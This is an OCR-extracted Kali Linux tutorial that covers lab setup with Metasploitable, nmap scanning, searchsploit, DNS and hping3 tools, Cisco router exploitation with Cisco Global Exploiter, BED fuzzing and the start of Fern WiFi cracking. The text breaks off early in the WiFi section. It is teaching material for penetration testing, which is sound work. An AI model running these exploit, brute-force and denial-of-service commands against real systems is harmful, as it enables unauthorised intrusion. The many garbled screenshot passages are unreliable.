Bilal Ahmed Shaik Kali Linux

1.
Kali Linux – Installation & Configuration

Kali Linux
Kali Linux is one of the best security packages of an ethical hacker, containing a set of
tools divided by the categories. It is an open source and its official webpage is
https://www.kali.org.
Generally, Kali Linux can be installed in a machine as an Operating System, as a virtual

machine which we will discuss in the following section. Installing Kali Linux is a practical
option as it provides more options to work and combine the tools. You can also create a
live boot CD or USB. All this can be found in the following link:
https://www.kali.org/downloads/
BackTrack was the old version of Kali Linux distribution. The latest release is Kali 2016.1
and it is updated very often.
* E-illO···
Our Most Advanced Penetration Testing Distribution, Ever.

I
To install Kali Linux ─
 First, we will download the Virtual box and install it.
 Later, we will download and install Kali Linux distribution.
Download and Install the Virtual Box

A Virtual Box is particularly useful when you want to test something on Kali Linux that you
are unsure of. Running Kali Linux on a Virtual Box is safe when you want to experiment
with unknown packages or when you want to test a code.
With the help of a Virtual Box, you can install Kali Linux on your system (not directly in
your hard disk) alongside your primary OS which can MAC or Windows or another flavor
of Linux.
Let’s understand how you can download and install the Virtual Box on your system.
1
Kali Linux
Step 1: To download, go to https://www.virtualbox.org/wiki/Downloads. Depending on

your operating system, select the right package. In this case, it will be the first one for
Windows as shown in the following screenshot.
VirtualBox
Download VlrtualBox
VlnualBox binaries
• VirtUillBo.x. platloon p.tdl.tlqes. The bIn.aJ_.ate ~ WII5ft lhot lef"nu of the: GPl V«lslon 1.
• vi I x f ,wan ~
• v .rtuaIBO)C S •.1..2 for OS X hOses M'Id64
• virtu.l.ox :5.1..' for Lift.u. bosb
• Vfrtu.J80x 5.1..2 for SOAris bosts ..<lIIDiJ64
• vll'tlMt180X S..l.2 ~te YH vimMJ80x fXt~ P.ctt AI suoDOrted platforms
~fll)Ol't for USB 2.0 aM USB ).0 ~ 't'Inlutb RDPaM PX£ boot fot !til!! tatdt. see this tbl"tf:l' ftom tlle usee Manual tot an lnuoduct
en.nslon'~ ~ .",.~ uMIIr ~ Vftt1At6oa ~ VM aM E:vfh,llriM liao"", (flUFI.).
PiNse InStall die Elm?/lSiM (J«iC w'll1llhe sarr» WIstM.is ~fMUlie<I ~ of Virru~:
II you ere ~ Vf.rt_JIJOII 5.o..l6, pluse ~ UN elltet'lSlDlt p.td- bent,
If you~,. I/M!IlJ VltfIH'lJIk»f <fJ.34, pIHfA ~ u.. t!lflllt'I~ t>Mk ,,~
Step 2: Click Next.
~ Oracle VM VirtualBox 5.1.2 Setup
Welcome to the Oracle VM

VirtualBox 5.1.2 Setup Wizard
The Setup Wizard will nstan Orade VM VirtualBox 5.1. 2 on

your computer. Click Next to continue or Cancel to eXit the
Setup Wizard.
Version 5. 1.2 ( ~ext > :J ~el I
2
Kali Linux
Step 3: The next page will give you options to choose the location where you want to
install the application. In this case, let us leave it as default and click Next.
i%I Orecle VM Virtu_IBox 5.1.2 Setup
Custom Setup
Select !he way you want features II) be Inslzlled.
Clickon Ihe Iconsin Ihe tree below II) change Ihe way features will be Installed.
Orade VMVirtualBox 5.1.2

"Il!liication.
IforluaiBox Networking
Virtuallox Bridged Netwottonl
lAs feabs. requires 16'1M8 on
Virtuallox Host-only Netwo<I your hard drive. It has 3 of 3
VirbJil160xPylhon 2.x Support ...efe_bses selected. The
s..bfe_tures require 692KB on yo ...
m
location: C:'Program A1es\Orade\Virtuallox\ Browse
Version 5.1.2 Disk Usage < Bade II Next> cancel
Step 4: Click Next and the following Custom Setup screenshot pops up. Select the
features you want to be installed and click Next.
'~
~ Oracle VM VirtualBox 5.1.2 Setup
Custom Setup
Select Ihe way you want features II) be instaled.
Pleasechoose from Ihe options below:
I~r-""""""""'--""""""""'-"
a ~Qr.!9.,Jtoo..tb~~~~
!;r..~.~.te
o Create a shortcut nlhe Quide launch Bac

o Register file associations
Version 5. 1.2 I <Il.adc II ~ext> I I s;Ancel I

3
Kali Linux
Step 5: Click Yes to proceed with the installation.
Warning:
Network Interfaces
Instalng the Oracle VM Vi'tuaIBox 5.1.2 Nelw<lrtcing featl.l:e

wi reset you netwutc ""."",tiOIl and tetrcx>rarfv
disa>Mect you from the netwutc.
Proceed .. th nstalation now?
Version 5.1. 2
Ir·myesm ..~
'111"",""" ."'1WIt.
~O
Step 6: The Ready to Install screen pops up. Click Install.
R".dv to Install
The Setup Wizard Is readv to begin the Custom installation.
-
Ock Instal to begin the nstala_. If youwant to review Q( change any of you
nstalation setWl9S. dck Badt. Ock CIfnI to .>Cit the wizard.
Version 5.1.2 < Il.~c:k I[·..

....:.'...~~tili"":"fl
~.J =j) I:;ancel
4
Kali Linux
Step 7: Click the Finish button.
1M! Oracle VM VirtualBox 5.1.2 Setup
Oracle VM VirtualBox 5.1.2

installation is complete.
C6ck the Fmish button to exit the Setup Wizard.
~ Start Orade VM VirtualBox 5.1. 2 after installation
Version 5.1.2 < Back 1!,__Fil11_'sh_-, Cancel
The Virtual Box application will now open as shown in the following screenshot. Now we
are ready to install the rest of the hosts for this manual and this is also recommended for
professional usage.
t) Oracle VM Virtual Box Manager
file Machine !::!elp
O@
New Setbngs
Il, c"
Discard Star t.
I iD Details I ~ ~ots
Welcome to Vortuallox!
The IeftpartoftnsvMdowisatistofaDvirtualmachinesonyourcomputer. The list is empty now
because you haven't aeall!d any virtual machines yet.
In order to aeall! a new llirtual machine, press the New button In the
mal> b:IoI bar Iocab!d at the top of the window.
You can press the f1key to get instant help, or visit

_.lIirlulll>ox.oro for theiab!stlnformation and news.
5
Kali Linux
Install Kali Linux

Now that we have successfully installed the Virtual Box, let’s move on to the next step and
install Kali Linux.
Step 1: Download the Kali Linux package from its official website:
https://www.kali.org/downloads/
o 18 offensive-security.comjkaIHinux-vrnware-virtuaIbox-image-download
_11® Blog Courses Certifications Online labs

~
Prebuilt Kali Linux VMware Images Prebuilt Kali Linux Virtual Box Images
Image Name Torrent Size Version SHA1Sum
Kali Linux 64 bit VM 1 Torrent 2.OG 2016.1 2b49bfle77cllecb5618249ca69a46f23a6f5d2d
Kali linux 32 bit VM PAE 1 Torrent 2.OG 2016.1 e7186 7a8bbf7ad55 fa43 7eb 7c93 fd6ge450f6759
Step 2: Click VirtualBox -> New as shown in the following screenshot.
9 Omdo VM ~onwISo. MlnagCl

f.l. Mitlolnt Hq,
&,1
~
'....
0
... N<>o
A.dd .•
Sdbn9'-
Cbl-"
CtJI-5
[GQ Clone. CtJI·O I!I toe ...... 1
~ ~ .........
_: ~I
(Id-I<
~_; \'lndoMlIIoII~tI
... Gd Group Cttl·u
lOOt
}J svotan
S"n
~Q " I
.... """'"'
lbltQo..,
WOI4I
Alopy.(lptal,kwclCo*
CbI·,
-
AcCHIQIiOft. VT • lAIC).", IIIa.... FOOi'!!. HtPoo<.VPr._tUll'
I....
~
tll
D•
Sh_LI!9.
. "-J
Ctll·l
'§lOBIIIoY
r... , l<deo_y:
_Ir '~l8""
\~COo""" t>sod<d
0 5~0!'I"'bfllO<tI
~ c,... t $hortt\ll OI'Io.ltop [fj ~toat·
ClIotr<*r. s.a'>.
BIf Sen s.a'>. 1'9<1 0: 1(1.1fdo&1Oo .... ~oo~
SlTAl'IIttu JQ:>"""""'''i SWj)¥l)5_"'_><~"elI_ll108..JU..6'8~_
~1IUdiD
_cn.." .~ndowoOr"-
.,.-.~ I......,~...........
6
Kali Linux
Step 3: Choose the right virtual hard disk file and click Open.
(I Please choose a virtual hard disk file x

« Kali-li ... ) Kali-linux-2015.1-vm-amd64 Search KaIo-linux-2015.1-vm- ... p
Orqanize v New folder m--· ITI G

Name Date modified Type
... OneDrive
~ Kali-Linux-2015.1-vm-amd64 2/1/20155:05 PM Virtual Machine Di .
I;!J This PC
~ Kali-Linux-2015.1-vm-amd64-s001 2/1/20155:18 PM Virtual Machine Di .
• Desktop
~ Kali-linux-2015.1-vm-amd64-s002 2/1/20155:18 PM Virtual Machine Di .
~ Documents ~ Kali-linux-2015.1-vm-amd64-sOO3 2/1/20155:18 PM Virtual Machine Di .
'" Downloads ~ Kali-linux-2015.1-vm-amd64-sQ04 2/1/20155:18 PM Virtual Machine Di...
J! Music ~ Kali-linux-2015.1-vm-amd64-s005 2/1/20155:18 PM Virtual Machin~ Di .
~ Pictures ~ Kali-Linux-2015.1-vm-amd64-s005 2/1/2015 S:18 PM Virtual Machine Di .

~ Kali-linux-2015.1-vm-amd64-s007 2/1/20155:18 PM Virtual Machine Di .
iii Videos
~ Kali-linux-2015.1-vm-amd64-sOOS 2/1/20155:18 PM Virtual Machme Di .
',;_ Local Disk (C:)
_ Local Disk (0:)
DVDRW Drive (E
~ ..' .........
~I.
v < >
File name: v
Open I [Cancel 1
.:!
Step 4: The following screenshot pops up. Click the Create button.
? X
{- Create Virtual Machine
Name and operating system
Name: IKali 2016.1. 1
Type: ~l=in=ux==========================================.~~
Version: 1
Other linux (64{>it) ·1
,
,
Memory size
, ,
8192MB
Hard disk
o Do not add a virtual hard disk
o Create a virtual hard disk now
® Use an existing virtual hard disk file
KaIH.lnux-2016.1·vm-amd6~.vmdk (NonMI. 3O.00G8)
Q.idod Mode II ere.te II Cancel _j
7
Kali Linux
Step 5: Start Kali OS. The default username is root and the password is toor.
Update Kali
It is important to keep updating Kali Linux and its tools to the new versions, to remain
functional. Following are the steps to update Kali.
Step 1: Go to Application -> Terminal. Then, type “apt-get update” and the update will
take place as shown in the following screenshot.
root@kali: - oao
8
Kali Linux
Step 2: Now to upgrade the tools, type “apt-get upgrade” and the new packages will be
downloaded.
,,_"
root@kall:~
.
File Edit View Searcn Terminal Help
Reading package lists ... Done
>#
:-#
:-#
apt·get upgrade :-#
Reading package lists ... Done
Building dependency tree
Reading state information ... Done
Calculating upgrade ... Done
The following packages ~ere automatically installed and are no longer required:
castxml gccxml gdebi-core libasnl-8-heimdal libgssapi3-heimdal
libhcrypt04-heimdal libhdb9-heimdal libheimbasel-heimdal
libheimntlmG-heimdal libhx509-5-heimdal libkdc2-heimdal libkrb5-26-heimdal
libntdbl lib roksn lB -heimdal libwindG -heimdal python -ctypesl ib python -ecdsa
python-ntdb python-pyatspi python-tidylib vlc-plugin-notify vlc-plugin-samba
Use 'apt autoremove' to remove them.
The following packages have been kept back:
adwaita-icon-theme apktool backdoor-factory bind9-host binwalk bluez
bluez-obexd bundler cadaver couchdb cpp cpp-5 cutycapt default-jdk
default-j re default-j re-headless dnsutils dradis driftnet erlang-asnl
erlang-base ef'lang-crypt o erlang-eunit erlang-inets erlang-mnesia
erlang-os-mon ef'lang-public -key ef-lang-runtime-tools erlang-snmp erlang-ssl
e rlang -syntax -tools e rlang -tool s e rlang -xme r'levolut ion -data -se rve r
evolution-data-server-common file folks-common ftp g++ g++-5 gee gce-5
gec-5-base gdm3 gedit gedit-common ghostseript girl.2-gdkpixbuf-2.G
girl.2-gnomedesktop-3.0 glrl.2-gst-plugins-base-l.G girl.2-gstreamer-l.0
. ,- J .
Step 3: It will ask if you want to continue. Type “Y” and “Enter”.
. "
" .i ,I 'I'" 1 " .... 1 I .1 • .1 • " I' • '0 .... 11 •• !- 1 I' I. jl I j •••
I. _. -!' jf fIt"" • j I:.'

'P~'I~' ,'11- I, l r , r"~ r .,j, -j '"11 J,"- ;., I. ~ c_ ....
[ , ,~I II' •• l' .. ; ,I I ro
9
Kali Linux
Step 4: To upgrade to a newer version of Operating System, type “apt-get dist-

upgrade”.
Laboratory Setup
In this section, we will set up another testing machine to perform the tests with the help
of tools of Kali Linux.
Step 1: Download Metasploitable, which is a Linux machine. It can be downloaded from

the official webpage of Rapid7: https://information.rapid7.com/metasploitable-
download.html?LS=1631875&CS=web
o
RAPID·.
-- . " I I
Metasploitable - Virtual Machine to Test Metasploit

Ot.wnl od It t ... '1
t ..... t f'Md'n,. 1« evlllutt"" ~t
r"AlfJfN~_"~c.. ....
~ ~''''
-----~.~
dtWI'l ..... I.CO'IIN;I
,..,_~ __ ..... ~
~.~ far""......
_
~_....... ...,....,_ ..... _Lna .. ~
~"'I~..". • I
".-."-C!I"",,(lN,ltJ (11w ~ ..... ...........,.. ~
~.~~~ctoa,..~,..__
1IIn.wonf .... ~. ,
~LH
........ -'" ~
~~c.. 'I'W ...... __ -.c
. ]
"'1!Inorv_~~
...... 'woe,_,r:J
OownloM , ••• ~,...

.'tPI,.toanl
'tOUQ to "''"P. '10
Miih!'M
10
Kali Linux
Step 2: Register by supplying your details. After filling the above form, we can download
the software.
RAPID»
Thank you for registering for Metasploitable
To download Metasptoltal>te. dick here!
Do you have a ~opy of ~asptoll 10 US(! .ga''''1

Mela.ploltablel
M~ c:.daI..,_ooe. .... ~OI __ .....e.cn. ... ,., ... -'il11Ih free Meta.plolt
1~1I'W~"~1IP4I!ng ~m"""'" Download
Get 'tour CODY or the
Step 3: Click VirtualBox -> New.
9 Ohck IJM ~Mwlagu

file
"".... .....
OIJ ,.11Nr._
""·H I
<:> an·,
-0 ........
Add ••
"' ao-.
~Q c......
R__
I~...
...
",
"""0
""
_u .. ""'"
Q:8U'1O ~
0_
""
\IIId::IM l!D (64«0
.....
~O ( ....... ... ......
....()oWJ
Itttt:1#ttT.....
,. l5Ot ....
....... ~;;n~
'IT--:fNi()ol( "'1"'_"',,..,..~.,,,'I\'If""'''1lOn
c,
~
o. ••• ... ....., u-
fI!
...,..
SMwL ....
VCItt""""'"
'_'_Od\_~
.".
0Nb1P:f
0 ~.n~ ~~ ~~=="'~"~--------------------------,
:J_
" "" c.t.Jtl!'~«tD~
~:y;:;a,
Iiil ~~It "1.'Wd~,75.Q)CB)
Sli:'),trron L (CDiIdCnood$N_O-CS_ ........ ..J.. j)CJ;U'I:_'WtfI_1.OOi_lll_6061~_
,.-_
iP-
ttmcn.e- ............
wn:ir::IM~
11
Kali Linux
Step 4: Click “Use an existing virtual hard disk file”. Browse the file where you have
downloaded Metasploitable and click Open.
·_............. -......... •• ._, ,. '.

x
_ ..._...._
-~-
_._,--
..,,_
t'
.-.. _
............... ~_
...- .. ....
p
.~•
....
.-'"
.-
~-
--.-
J-
l
--
')00
O_
1iJ""'
WNII .. ·..
_
--~~~.~M::o~'-- _
-"_-'~
IDiMI_T
\!a .'~~~~
lUiIGIl
'8 ,__ ~ ........... HJIIftf' ....
ICEJI "'"
Step 5: A screen to create a virtual machine pops up. Click “Create”.
? X
Create Virtual Machin~
Name and operating system
I
Name: Metasploitabl~
Type:
Version:
Memory size
4MB
,
, I , I I I I I I I I I I I I I • I I I I I , I I
8192 MB
11024 t=:=Il MB
Hard disk
o Do not add a \/i'tual hard disk

o Create a virtual nard disk now
@ Use an ~xisting virtual hard disk fie
I
[MetasplOitable.vmdk (Normal, B,OO GB)
[Guided Mode I" Create III Cancel
12
Kali Linux
The default username is msfadmin and the password is msfadmin.
ea Metasploltable [Running) - Oracle VM Virtu,IBox o x

file Machine View Input Devices Help
13
2. Kali Linux ─ Information Gathering Tools
Kali Linux
In this chapter, we will discuss the information gathering tools of Kali Linux.
NMAP and ZenMAP

NMAP and ZenMAP are useful tools for the scanning phase of Ethical Hacking in Kali Linux.
NMAP and ZenMAP are practically the same tool, however NMAP uses command line while
ZenMAP has a GUI.
NMAP is a free utility tool for network discovery and security auditing. Many systems and
network administrators also find it useful for tasks such as network inventory, managing
service upgrade schedules, and monitoring host or service uptime.
NMAP uses raw IP packets in novel ways to determine which hosts are available on the
network, what services (application name and version) those hosts are offering, which
operating systems (and OS versions) they are running, what type of packet filters/firewalls
are in use, etc.
Now, let’s go step by step and learn how to use NMAP and ZenMAP.
Step 1: To open, go to Applications -> 01-Information Gathering -> nmap or zenmap.

,.,
14
Kali Linux
Step 2: The next step is to detect the OS type/version of the target host. Based on the
help indicated by NMAP, the parameter of OS type/version detection is variable “-O”. For
more information, use this link: https://nmap.org/book/man-os-detection.html
The command that we will use is:
nmap -O 192.168.1.101
The following screenshot shows where you need to type the above command to see the
Nmap output:
<!> Zenmap o x
Sqn Iools erofile Help
Target: ~92.168.1.101 Ivl Profile:[ Ivl Scan Cancel
Command: r.G~m~a~p~.~O)1!19il2~.1~68a.~1~.1001'-:;1::::::~~c~o~rn~n~,;a~"clcltthh;attii~lI~s;edd------------------'
Host. II Services 1 Nmap OUlpul Ports/ Hosts Topology Ho.t Dttails Scans
OS • Host Inmap.O 192.168.1.101 ~ Details

'3l 192.168.1.101 22/tcp open ssh A
23/tcp open tel net
25/tcp open s.tp
53/tcp open domain
se/tcp open http
lll/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open .icrosoft-ds
5l2/tcp open exec
5l3/tcp open login
5l4/tcp open shell
1099/tcp open r.iregistry
1524/tcp open ingreslock
2049/tcp open nfs
2l2l/tcp open ccproxy·ftp
3306/tcp open .ysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open XII
6667/tcp open ire
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 88:00:27:01:3368 (Oracle VirtuolBox
virtual 11IC)
Oevice type: general purpose
Running: linux 2.6.X~
OS CPE: cpe:/o:linux:linux_kernel:2.6 _ OS details
OS details: Linux 2.6.9 . 2.6.33_
Network Ois~ance: 1 hop
os detection performed. Please report any incorrect

results at https://nmap.org/submit/
Nmao done: 1 IP address (1 host up) scanned in 17.55
seconds
Filter
Hosts
Step 3: Next, open the TCP and UDP ports. To scan all the TCP ports based on NMAP, use
the following command:
nmap -p 1-65535 -T4 192.168.1.101
Where the parameter “–p” indicates all the TCP ports that have to be scanned. In this
case, we are scanning all the ports and “-T4” is the speed of scanning at which NMAP has
to run.
15
Kali Linux
Following are the results. In green are all the TCP open ports and in red are all the closed
ports. However, NMAP does not show as the list is too long.
Target: [i_92.168.1.101 ~ Profile:
Command: I nmap -p 1-65535-T4 192.168.1.101

Hosts lr=seNices Nmap Output PortsI Hosts Topology Host Details Scans
os < Host :nmap-pl-65535-T4192.168.1.101 I~I§ I Detailsl

~ 192.168.1.101
Starting Nmap 7.12 ( https://nmap.org ) at 2016-09-16
18:04 Central European Daylight Time
Nmap scan report for 192.168.1.191
Host is up (0.000010s latency).
Not shown: 65505 closed ports~
PORT STATESERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftpJ
3306/tcp open mysql
3632!tcp open distccd
S432!tcp open postlresql
S900/tcp open vnc
_/tcp open X11
6667/tcp open ire
8009/tcp open ajp13
FilterHosts 51161/tcp open unknown
Stealth Scan
Stealth scan or SYN is also known as half-open scan, as it doesn’t complete the TCP
three-way handshake. A hacker sends a SYN packet to the target; if a SYN/ACK frame is
received back, then it’s assumed the target would complete the connect and the port is
listening. If an RST is received back from the target, then it is assumed the port isn’t active
or is closed.
SYN+Port number
HOST 1 HOST 2
RST
( Port Is Closed
J
16
Kali Linux
SYN+Port number
HOST 1 SYNIACK HOST 2
(
RST
Port 18 Open
..
Now to see the SYN scan in practice, use the parameter –sS in NMAP. Following is the full
command –
nmap -sS -T4 192.168.1.101
The following screenshot shows how to use this command:
<I> Zenmap o x
SCj!n Ioois £rofile J::!elp
Target: 1192.168.1.101 Iv Profile:
Command: [nmap -sS-p 1-6500192.168.1.101
I Hosts II Services I Nmap Output PortsI Hosts Topology Host DetailsScans
os ~ Host !nmap-sS-p1-65OO192.168.1.101 Ivl ;; I Details

~ 192.168.1.101
Starting 'Imap 7.12 ( https://nmap.org ) at 2016-09-16
22:34 Central European Daylight Time
Nmap scan report for 192.168.1.101
Host is up (9.09930s latency).
Not shown: 6479 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
S3/tcp open da.ain
S0/tcp open http
lll/tcp open rpcbind
445/tcp openl microsoft-ds
S12/tcp open exec
5l3/tcp open login
5l4/tcp open shell
1099/tcp open rmiregistry
l524/tcp open increslock
2049/tcp open nfs
2l2l/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
MAC Address: 08:00:27:01:33:60 (Oracle VirtualBox
virtual tHC)
~maD done: 1 IP address (1 host up) scanned in 16.38

seconds
17
Kali Linux
Searchsploit
Searchsploit is a tool that helps Kali Linux users to directly search with the command line
from Exploit database archive.
To open it, go to Applications -> 08-Exploitation Tools -> searchsploit, as shown in the
following screenshot.
After opening the terminal, type "searchsploit exploit index name".
root@kali: N
oeG
File Edit View Search Terminal Help
: --it searchsploit windo,is
Exploit Title I Path

I (Ius rlsha r'e/exploitdb/plat fo rms)
r-licr-osoft WebDAV ' (rit dlL .dll ) Remot ./ I remoteil .c

Microsoft WebDAV ' Remote PoC Exploi .1 I r'emote/2.c
Microsoft RPC Locator Service, Remo .1 Iremote/S.c
Apache HTTP Server 2,x Memory Leak Exploit ,I Idos/9.c
Microsoft Internet Explorer II ' Crash PoC ,I Idos!37060.html
(hlndi Server 1.0 ' Denial of Service Exploi .r Idos/13,c
Xeneo Web Server 2.2.9.0 ' Denial of Service ,I Idos/l7.pl
Microsoft 5MB ' Authentication Remot ,I Ir'emote/20. txt
Pi3Web 2.0.1 ' Denial of Service, Proof of ,I Idos/22.c
Real Server < 8,0.2 ' Remote Exploit (Window ,I /r'emotei23.c
Kerio Personal Firewall 2.1.4 ' Remote Code remote/28.c
18
Kali Linux
DNS Tools
In this section, we will learn how to use some DNS tools that Kali has incorporated.
Basically, these tools help in zone transfers or domain IP resolving issues.
dnsenum.pl
The first tool is dnsenum.pl which is a PERL script that helps to get MX, A, and other
records connect to a domain.
Click the terminal on the left panel.
'"
,••• " , 1 ..
Type “dnsenum domain name” and all the records will be shown. In this case, it shows
A records.
19
Kali Linux
DNSMAP
The second tool is DNSMAP which helps to find the phone numbers, contacts, and other
subdomain connected to this domain, that we are searching. Following is an example.
Click the terminal as in the upper section , then write “dnsmap domain name”
dnstracer
The third tool is dnstracer, which determines where a given Domain Name Server (DNS)
gets its information from for a given hostname.
Click the terminal as in the upper section, then type “dnstracer domain name”.
:-# dnst racel- " .com

Tracing to . .com[a] via 127.8.0.1, maximum of 3 retries
127.0.0.1 (127.0.8.1) + + t
,
20
Kali Linux
LBD Tools
LBD (Load Balancing Detector) tools are very interesting as they detect if a given domain
uses DNS and/or HTTP load balancing. It is important because if you have two servers,
one or the other may not be updated and you can try to exploit it. Following are the steps
to use it:
First, click the terminal on the left panel.
Then, type “lbd domainname”. If it produces a result as “FOUND”, it means that the
server has a load balance. In this case, the result is “NOT FOUND”.
Hping3
Hping3 is widely used by ethical hackers. It is nearly similar to ping tools but is more
advanced, as it can bypass the firewall filter and use TCP, UDP, ICMP and RAW-IP
protocols. It has a traceroute mode and the ability to send files between a covered channel.
Click the terminal on the left panel.
21
Kali Linux
Type “hping3 –h” which will show how to use this command.
:-# hping3 -h
usage: hping3 host [options]
-h --help show this help
-v --version show version
"C • -count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for ·i u10000 (10 packets for second)
·-faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric nume ri c output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
·v ·-ve rbose verbose mode
-D --debug debugging info
--bind bind ct rL += to ttl (default to dst port)
-z ·-unbind unbind ct ,'1+=
--beep beep fa r eve '-y matching packet received
Mode
default mode TCP
-0 --rawip RAW 1P mode
-1 ·-icmp 1CMP mode
-2 --udp UDP mode
The other command is “hping3 domain or IP -parameter”
:-# hping3 192.168.1.102 -v

using eth0, addr: 192.168.1.101, MTU: 1500
HPmG 192.168.1.102 (eth0 192.168.1.102): NO FLAGS are set, 40 headers + 0 data
bytes
len=46 ip=192.168.1.102 ttl=64 DF id=0 tos=0 iplen=40
spa rt=0 flags=RA ssq=O win=0 rtt=10.6 ms
seq=0 ack=982034245 sum=c40 urp=0
len=46 ip=192.168.1.102 ttl=64 DF id=0 tos=0 iplen=40

spo rt=O flags=RA seq=1 win=0 rtt=0.4 ms
seq=0 ack=1964174310 sum=dfc0 urp=0
22
3. Kali Linux ─ Vulnerability Analyses Tools
Kali Linux
In this chapter, we will learn how to use some of the tools that help us exploit devices or
applications in order to gain access.
Cisco Tools
Kali has some tools that can be used to exploit Cisco router. One such tool is Cisco-torch
which is used for mass scanning, fingerprinting, and exploitation.
Let’s open the Terminal console by clicking the left pane.
Then, type “cisco-torch –parameter IP of host” and if there is nothing found to exploit,
then the following result will be shown.
:-# cisco-tor-ch -n .1
Using config fi1e torch.conf .
Loading inc1ude and p1ugin .
###############################################################
# Cisco Torch Mass Scanner #
# Becase ~e need it... #
# http:// ..
:vv ·''.arhont.com/cisco-tor-ch.p1 #
###############################################################
List of targets contains 1 host(s)

1735: Chec~lng 10.22.21.1 ...
- - ->
- A11 scans done. Cisco Torch Mass Scanner
---> x·
23
Kali Linux
To see what are the parameters that can be used, type “cisco-touch ?”
:-# cisco-torch?
Using config file torch.conf .
Loading include and plugin .
ve rsi on
usage: cisco-torch <options> <IP,hostname,network>
or: cisco-torch <options> -F <hostlist>
Available options:
-0 <output file>
-A All fingerprint scan types combined
-t Cisco Telnetd scan
-s Cisco SSHd scan
-u Cisco SNMP scan
-g Cisco config or tftp file download
-n NTP fingerprinting scan
-j TFTP fingerprinting scan
-1 <type> loglevel
c c rLt Lcal (default)
v ve rbose
d debug
-w Cisco Webserver scan
Cisco Auditing Tool

It is a PERL script, which scans Cisco routers for common vulnerabilities. To use it, again
open the terminal on the left pane as shown in the previous section and type “CAT –h
hostname or IP”.
You can add the port parameter “-p” as shown in the following screenshot, which in this
case is 23 to brute-force it.
24
Kali Linux
Cisco Global Exploiter

Cisco Global Exploiter (CGE) is an advanced, simple, and fast security testing tool. With
these tools, you can perform several types of attacks as shown in the following screenshot.
•
However, be careful while testing in a live environment as some of them can crash the
Cisco devise. For example, option can stop the services.
: -# cge .ct
Usage :
pe rl cge.pl <tat-get> <vulnerability number>
VUlnerabilities list
[1] Cisco 677/678 Telnet Buffer Overflow VUlnerability
[2] Cisco lOS Router Denial of Service VUlnerability
[3] Cisco lOS HTTP Auth VUlnerability
[4] Cisco lOS HTTP Configuration Arbitrary Administrative Access VUlnerability
[5] Cisco Catalyst SSH ProtocoL Mismatch Denial of Service VUlnerability
[6] Cisco 675 Web Administration Denial of Service VUlnerability
[7] Cisco Catalyst 3500 XL Remote Arbitrary Command VUlnerability
[8] Cisco lOS Software HTTP Request Denial of Service VUlnerability
[9] Cisco 514 UDP Flood Denial of Service VUlnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service VUlnerability
I
[11] - Cisc 0 Catal yst ~1emory Leak vutns rability
[12] Cisco CatOS CiscoView HTTP Server Buffer Overfl.ow VUlnerability
[13] - 0 Encoding IDS Bypass VUlnerability (UTF)
[14] - Cisco lOS HTTP Denial of Service VUlnerability
To use this tool, type “cge.pl IPaddress number of vulnerability”
The following screenshot shows the result of the test performed on Cisco router for the
vulnerability number 3 from the list above. The result shows the vulnerability was
successfully exploited.
:-# cge.pl 10.22.21.1 3

I
VUlnerabILIty successfuL exploited wIth [http://10.22.21.1/1evel/17/exec/ ....] .
,
25
Kali Linux
BED
BED is a program designed to check daemons for potential buffer overflows, format strings,
et. al.
:-# bed
BED 0.5 by mjm (www.codito.de) & er-ic (www.snake-basket.de)
Usage:
./bed.pl -s <plugin> -t <target> -p <port> -0 <timeout> [ depends on the plugin

1
<plugin> FTP/SMTP/POP/HTTP/IRC/IMAP/PJL/LPO/FINGER/SOCKS4/S0CKS5
<target> Host to check (default: localhost)
<port> Port to connect to (default: standard port)
<timeout> seconds to wait after each test (default: 2 seconds)
I
use "./bed.pl -s <plugin>" to obtain the parameters you need for the plugin.
Only -s is a mandatory switch.
In this case, we will test the testing machine with IP 192.168.1.102 and the protocol
HTTP.
The command will be “bed –s HTTP –t 192.168.1.102” and testing will continue.
># bed -s HTTP -t 1'12.1'58.1.1G2
BED G.5 by mjm ( w"·,,.codito.de ) s et-ic ( lII'ww.snake-basket.de )
+ Buffer overflow testing:

testing: 1 HEAD XAXAX HTTP/I.G
testing: 2 HEAD / XAXAX .
testing: 3 GET XAXAX HTTP/I.G .
testing: 4 GET ! XAXAX .
testing: 5 POST XAXAX HTTP/I.G .
testing: 6 POST / XAXAX .
testing: 7 GET /XAXAX .
testing: 8 POST /XAXAX .
+ Formatstring testing:
testing: 1 HEAD XAXAX HTTP/I.G
testing: 2 HEAD / XAXAX
testing: 3 GET XAXAX HTTP/I.G
testing: 4 GET / XAXAX
testing: 5 POST XAXAX HTTP/I.G
testing: 6 POST / XAXAX
testing: 7 GET IXAXAX
testing: 8 POST /XAXAX
• Normal tests
+ Buffer overflow testing:
testing: 1 User-Agent: XAXAX .
testing: 2 Host: XAXAX .
testing: 3 Accept: XAXAX .
testing: 4 Accept-Encoding: XAXAX .
testing: 5 Accept-Language: XAXAX .
testing: 6 Accept-Charset: XAXAX .
testing: 7 Connection: XAXAX .
26
4. Kali Linux ─ Wireless Attacks Kali Linux
In this chapter, we will learn how to use Wi-Fi cracking tools that Kali Linux has
incorporated. However, it is important that the wireless card that you has a support
monitoring mode.
Fern Wifi Cracker

Fern Wifi cracker is one of the tools that Kali has to crack wireless.
Before opening Fern, we should turn the wireless card into monitoring mode. To do this,
Type “airmon-ng start wlan-0” in the terminal.
roo.(IIIeaIl: -
Now, open Fern Wireless Cracker.
Step 1: Applications -> Click “Wireless Attacks” -> “Fern Wireless Cracker”.
27
Kali Linux
Step 2: Select the Wireless card as shown in the following screenshot.
Fem WIFI Cracker
.. wtonO e 1::: Rerr.. , l'

Montor ""oc:!< EnAbled Dr! mCH"'O
(c·» San fot Access poru
Deltel"" SU~
~WPA
(kIIbte tt. (he(". for l,.pcltes,network tl,.,tOut
